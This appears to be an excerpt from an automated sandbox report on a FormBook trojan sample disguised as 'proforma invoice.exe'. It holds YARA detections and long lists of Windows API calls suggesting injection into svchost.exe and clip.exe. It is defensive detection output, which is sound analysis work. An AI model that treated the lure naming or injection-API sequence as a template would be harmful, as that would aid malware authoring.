            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B39576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00B39576

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.4103118117.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849019364.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4103939789.0000000004CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849710409.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4103994026.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.4104123201.0000000002480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1849745711.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4103118117.0000000003040000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1849019364.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4103939789.0000000004CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1849710409.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4103994026.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000002.00000002.4104123201.0000000002480000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1849745711.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Binary is likely a compiled AutoIt script file
            Source: proforma invoice.exeString found in binary or memory: This is a third-party compiled AutoIt script.
            Source: proforma invoice.exe, 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_54ff3714-2
            Source: proforma invoice.exe, 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_87820256-0
            Source: proforma invoice.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_b08aa060-7
            Source: proforma invoice.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_e5e37191-b
            Initial sample is a PE file and has a suspicious name
            Source: initial sampleStatic PE information: Filename: proforma invoice.exe
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042AFF3 NtClose,1_2_0042AFF3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272B60 NtClose,LdrInitializeThunk,1_2_03272B60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272DF0 NtQuerySystemInformation,LdrInitializeThunk,1_2_03272DF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272C70 NtFreeVirtualMemory,LdrInitializeThunk,1_2_03272C70
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032735C0 NtCreateMutant,LdrInitializeThunk,1_2_032735C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03274340 NtSetContextThread,1_2_03274340
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03274650 NtSuspendThread,1_2_03274650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272BA0 NtEnumerateValueKey,1_2_03272BA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272B80 NtQueryInformationFile,1_2_03272B80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272BE0 NtQueryValueKey,1_2_03272BE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272BF0 NtAllocateVirtualMemory,1_2_03272BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272AB0 NtWaitForSingleObject,1_2_03272AB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272AF0 NtWriteFile,1_2_03272AF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272AD0 NtReadFile,1_2_03272AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272F30 NtCreateSection,1_2_03272F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272F60 NtCreateProcessEx,1_2_03272F60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272FA0 NtQuerySection,1_2_03272FA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272FB0 NtResumeThread,1_2_03272FB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272F90 NtProtectVirtualMemory,1_2_03272F90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272FE0 NtCreateFile,1_2_03272FE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272E30 NtWriteVirtualMemory,1_2_03272E30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272EA0 NtAdjustPrivilegesToken,1_2_03272EA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272E80 NtReadVirtualMemory,1_2_03272E80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272EE0 NtQueueApcThread,1_2_03272EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272D30 NtUnmapViewOfSection,1_2_03272D30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272D00 NtSetInformationFile,1_2_03272D00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272D10 NtMapViewOfSection,1_2_03272D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272DB0 NtEnumerateKey,1_2_03272DB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272DD0 NtDelayExecution,1_2_03272DD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272C00 NtQueryInformationProcess,1_2_03272C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272C60 NtCreateKey,1_2_03272C60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272CA0 NtQueryInformationToken,1_2_03272CA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272CF0 NtOpenProcess,1_2_03272CF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03272CC0 NtQueryVirtualMemory,1_2_03272CC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03273010 NtOpenDirectoryObject,1_2_03273010
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03273090 NtSetValueKey,1_2_03273090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032739B0 NtGetContextThread,1_2_032739B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03273D10 NtOpenProcessToken,1_2_03273D10
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03273D70 NtOpenThread,1_2_03273D70
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA4650 NtSuspendThread,LdrInitializeThunk,3_2_04FA4650
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA4340 NtSetContextThread,LdrInitializeThunk,3_2_04FA4340
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA2CA0 NtQueryInformationToken,LdrInitializeThunk,3_2_04FA2CA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA2C70 NtFreeVirtualMemory,LdrInitializeThunk,3_2_04FA2C70
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA2C60 NtCreateKey,LdrInitializeThunk,3_2_04FA2C60
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA2DF0 NtQuerySystemInformation,LdrInitializeThunk,3_2_04FA2DF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA2DD0 NtDelayExecution,LdrInitializeThunk,3_2_04FA2DD0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA2D30 NtUnmapViewOfSection,LdrInitializeThunk,3_2_04FA2D30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA2D10 NtMapViewOfSection,LdrInitializeThunk,3_2_04FA2D10
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA2EE0 NtQueueApcThread,LdrInitializeThunk,3_2_04FA2EE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA2E80 NtReadVirtualMemory,LdrInitializeThunk,3_2_04FA2E80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA2FE0 NtCreateFile,LdrInitializeThunk,3_2_04FA2FE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA2FB0 NtResumeThread,LdrInitializeThunk,3_2_04FA2FB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA2F30 NtCreateSection,LdrInitializeThunk,3_2_04FA2F30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA2AF0 NtWriteFile,LdrInitializeThunk,3_2_04FA2AF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA2AD0 NtReadFile,LdrInitializeThunk,3_2_04FA2AD0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,3_2_04FA2BF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA2BE0 NtQueryValueKey,LdrInitializeThunk,3_2_04FA2BE0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA2BA0 NtEnumerateValueKey,LdrInitializeThunk,3_2_04FA2BA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA2B60 NtClose,LdrInitializeThunk,3_2_04FA2B60
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA35C0 NtCreateMutant,LdrInitializeThunk,3_2_04FA35C0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA39B0 NtGetContextThread,LdrInitializeThunk,3_2_04FA39B0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA2CF0 NtOpenProcess,3_2_04FA2CF0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA2CC0 NtQueryVirtualMemory,3_2_04FA2CC0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA2C00 NtQueryInformationProcess,3_2_04FA2C00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA2DB0 NtEnumerateKey,3_2_04FA2DB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA2D00 NtSetInformationFile,3_2_04FA2D00
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA2EA0 NtAdjustPrivilegesToken,3_2_04FA2EA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA2E30 NtWriteVirtualMemory,3_2_04FA2E30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA2FA0 NtQuerySection,3_2_04FA2FA0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA2F90 NtProtectVirtualMemory,3_2_04FA2F90
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA2F60 NtCreateProcessEx,3_2_04FA2F60
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA2AB0 NtWaitForSingleObject,3_2_04FA2AB0
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA2B80 NtQueryInformationFile,3_2_04FA2B80
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA3090 NtSetValueKey,3_2_04FA3090
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA3010 NtOpenDirectoryObject,3_2_04FA3010
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA3D70 NtOpenThread,3_2_04FA3D70
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_04FA3D10 NtOpenProcessToken,3_2_04FA3D10
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_03067B40 NtCreateFile,3_2_03067B40
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_03067F90 NtAllocateVirtualMemory,3_2_03067F90
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_03067E30 NtClose,3_2_03067E30
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_03067D90 NtDeleteFile,3_2_03067D90
            Source: C:\Windows\SysWOW64\clip.exeCode function: 3_2_03067CA0 NtReadFile,3_2_03067CA0
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B0D5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_00B0D5EB
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B01201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00B01201
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B0E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_00B0E8F6
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AA80600_2_00AA8060
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B120460_2_00B12046
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B082980_2_00B08298
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00ADE4FF0_2_00ADE4FF
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AD676B0_2_00AD676B
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B348730_2_00B34873
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00ACCAA00_2_00ACCAA0
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AACAF00_2_00AACAF0
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00ABCC390_2_00ABCC39
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AD6DD90_2_00AD6DD9
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00ABD0640_2_00ABD064
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AA91C00_2_00AA91C0
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00ABB1190_2_00ABB119
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AC13940_2_00AC1394
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AC17060_2_00AC1706
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AC781B0_2_00AC781B
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AC19B00_2_00AC19B0
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AA79200_2_00AA7920
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AB997D0_2_00AB997D
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AC7A4A0_2_00AC7A4A
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AC7CA70_2_00AC7CA7
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AC1C770_2_00AC1C77
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AD9EEE0_2_00AD9EEE
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00B2BE440_2_00B2BE44
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_00AC1F320_2_00AC1F32
            Source: C:\Users\user\Desktop\proforma invoice.exeCode function: 0_2_021036500_2_02103650
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004011C01_2_004011C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004021A51_2_004021A5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004021B01_2_004021B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FACB1_2_0040FACB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FAD31_2_0040FAD3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004023201_2_00402320
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004023BC1_2_004023BC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042D4431_2_0042D443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004164331_2_00416433
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040FCF31_2_0040FCF3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040DD731_2_0040DD73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402F501_2_00402F50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FA3521_2_032FA352
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324E3F01_2_0324E3F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033003E61_2_033003E6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E02741_2_032E0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C02C01_2_032C02C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032301001_2_03230100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DA1181_2_032DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032C81581_2_032C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033001AA1_2_033001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F81CC1_2_032F81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D20001_2_032D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032407701_2_03240770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032647501_2_03264750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323C7C01_2_0323C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325C6E01_2_0325C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032405351_2_03240535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_033005911_2_03300591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E44201_2_032E4420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F24461_2_032F2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EE4F61_2_032EE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FAB401_2_032FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F6BD71_2_032F6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323EA801_2_0323EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032569621_2_03256962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032429A01_2_032429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0330A9A61_2_0330A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324A8401_2_0324A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032428401_2_03242840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032268B81_2_032268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326E8F01_2_0326E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03282F281_2_03282F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03260F301_2_03260F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E2F301_2_032E2F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B4F401_2_032B4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032BEFA01_2_032BEFA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03232FC81_2_03232FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FEE261_2_032FEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240E591_2_03240E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03252E901_2_03252E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FCE931_2_032FCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FEEDB1_2_032FEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324AD001_2_0324AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DCD1F1_2_032DCD1F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03258DBF1_2_03258DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0323ADE01_2_0323ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03240C001_2_03240C00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E0CB51_2_032E0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03230CF21_2_03230CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F132D1_2_032F132D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322D34C1_2_0322D34C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0328739A1_2_0328739A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032452A01_2_032452A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032E12ED1_2_032E12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325D2F01_2_0325D2F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325B2C01_2_0325B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327516C1_2_0327516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322F1721_2_0322F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0330B16B1_2_0330B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0324B1B01_2_0324B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F70E91_2_032F70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FF0E01_2_032FF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032EF0CC1_2_032EF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032470C01_2_032470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FF7B01_2_032FF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F16CC1_2_032F16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032F75711_2_032F7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032DD5B01_2_032DD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FF43F1_2_032FF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032314601_2_03231460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032FFB761_2_032FFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0325FB801_2_0325FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B5BF01_2_032B5BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327DBF91_2_0327DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B3A6C1_2_032B3A6C
